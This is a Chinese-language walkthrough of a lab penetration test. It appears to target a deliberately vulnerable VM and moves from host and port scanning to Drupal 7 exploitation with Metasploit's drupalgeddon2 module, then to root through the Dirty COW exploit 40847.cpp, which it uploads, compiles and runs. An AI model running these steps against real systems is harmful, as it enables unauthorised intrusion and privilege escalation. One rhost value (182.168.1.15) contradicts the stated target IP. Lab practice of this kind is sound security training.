1 信息收集
1.1 主机发现
arp-scan -l
主机IP地址为:192.168.1.15
1.2 端口发现
nmap -sS -sV -A -T5 -p- 192.168.1.15
2 端口访问
2.1 80端口访问
2.2 1898端口访问
并且指纹识别信息,是一个drupal7的cms
3 渗透
3.1 利用msf渗透
1 在msf上搜索漏洞
search drupal
2 渗透
use exploit/unix/webapp/drupal_drupalgeddon2 set rhost 182.168.1.15 set rport 1898 run
4 提权
进入shell后,这个shell的界面不全,使用python的伪终端进行优化
python -c "import pty;pty.spawn('/bin/bash')"
4.1 提权
查看是否可以suid提权
find / -perm -4000 2>/dev/null
参考suid的提权的命令在线网站 GTFOBins 没有suid提权
查看版本内核信息
4.2 藏牛提权
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。
漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)
RHEL7 Linux x86_64 RHEL4(4.4.7-16) Debian 7(“wheel”) Ubuntu 14.04.1 LTS Ubuntu 14.04.5 LTS Ubuntu 16.04.1 LTS Ubuntu 16.10 Linux Mint 17.2
这个藏牛漏洞在msf没有现成的exp,所以需要去exploitdb上找。或者直接在kali上输入
searchsploit dirty
这里使用40847.cpp,其他的可能会使靶机崩溃。
上传漏洞的源码到靶机上 upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp 使用python调出交互模式 python -c "import pty; pty.spawn('/bin/bash')"
编译 g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow 40847.cpp -lutil 运行 ./dcow -s